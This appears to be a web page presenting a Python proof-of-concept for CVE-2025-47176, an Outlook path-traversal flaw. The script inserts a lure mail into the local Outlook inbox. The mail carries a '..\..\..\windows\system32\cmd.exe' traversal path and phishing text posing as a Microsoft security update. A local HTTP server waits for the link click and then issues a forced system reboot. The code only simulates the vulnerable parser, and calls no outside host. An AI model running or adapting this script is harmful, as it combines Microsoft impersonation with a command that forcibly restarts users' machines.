CVE-2025-47176 – CVE Helper

README.md
README.md not found for CVE-2025-47176. The file may not exist in the repository.
POC / PoC.py PY
⬇ Raw GitHub ✕ Close
#!/usr/bin/python
@ mahyarx CVE-2025-47176
import win32com.client
import threading
import time
import subprocess
import os
from http.server import HTTPServer, BaseHTTPRequestHandler

MALICIOUS_PATH = r"..\..\..\windows\system32\cmd.exe"
CHECK_DELAY = 10
HTTP_PORT = 8080
TRIGGER_URL = f"http://localhost:{HTTP_PORT}/activate"
MAIL_SUBJECT = "PoC CVE-2025-47176 - Injected Sync Path"


def inject_malicious_mail():
    try:
        print("[*] Connecting to Outlook COM interface...")
        outlook = win32com.client.Dispatch("Outlook.Application")
        namespace = outlook.GetNamespace("MAPI")
        inbox = namespace.GetDefaultFolder(6)  # Inbox

        print("[+] Creating mail item with malicious sync path payload...")
        mail = inbox.Items.Add("IPM.Note")
        mail.Subject = MAIL_SUBJECT

        html_body = f"""
        <html>
            <body>
                <p>Injected Sync Path: {MALICIOUS_PATH}</p>
                <p>Please click on the Update link to patch your Outlook security and privacy! Best Microsoft: <a href="{TRIGGER_URL}">here to activate the payload</a>.</p>
            </body>
        </html>
        """
        mail.HTMLBody = html_body
        mail.UnRead = True
        mail.Save()
        print("[+] Mail item saved and marked unread.")
        return True
    except Exception as e:
        print(f"[!] Failed to inject mail: {e}")
        return False


def normalize_path(path):
    return os.path.normpath(path)


def simulate_vulnerable_parser(path):
    print(f"[>] Original path: {path}")
    normalized = normalize_path(path)
    print(f"[!] Normalized path: {normalized}")

    if "cmd.exe" in normalized.lower():
        print("[!] Trigger condition met! Simulating system restart...")
        try:
            subprocess.call(["shutdown", "/r", "/t", "5"])
            print("[+] Restart command issued. System will reboot in 5 seconds.")
        except Exception as e:
            print(f"[!] Failed to execute restart command: {e}")
    else:
        print("[+] No execution triggered.")


class TriggerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/activate":
            print("[!] Trigger link clicked! Activating payload...")
            simulate_vulnerable_parser(MALICIOUS_PATH)
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body><h1>Payload Activated. Rebooting soon.</h1></body></html>")
            threading.Thread(target=self.server.shutdown, daemon=True).start()
        else:
            self.send_response(404)
            self.end_headers()


def run_http_server():
    server_address = ("", HTTP_PORT)
    httpd = HTTPServer(server_address, TriggerHandler)
    print(f"[*] HTTP Server listening on port {HTTP_PORT} for trigger link clicks...")
    httpd.serve_forever()


def main():
    print("=" * 60)
    print("[+] Starting CVE-2025-47176 PoC simulation")

    if not inject_malicious_mail():
        print("[!] Injection failed, aborting.")
        return

    print(f"[*] Waiting {CHECK_DELAY} seconds for mail to be processed by Outlook...")
    time.sleep(CHECK_DELAY)

    run_http_server()
    print("[*] HTTP server stopped. Exiting.")


if __name__ == "__main__":
    main()